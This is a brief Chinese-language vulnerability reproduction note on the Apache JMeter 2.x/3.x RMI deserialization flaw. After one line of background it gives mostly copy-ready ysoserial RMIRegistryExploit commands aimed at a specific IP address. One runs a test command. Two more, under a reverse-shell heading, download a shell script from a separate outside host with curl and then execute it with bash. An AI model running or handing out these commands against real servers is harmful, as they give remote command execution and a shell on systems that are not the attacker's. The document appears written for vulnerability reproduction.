原因
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。
复现
直接使用ysoserial即可进行利用:
java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'touch /tmp/success'

反弹shell
java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'curl http://216.127.164.238:7890/1.txt -o /tmp/shell.sh'
java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 '/bin/bash /tmp/shell.sh'
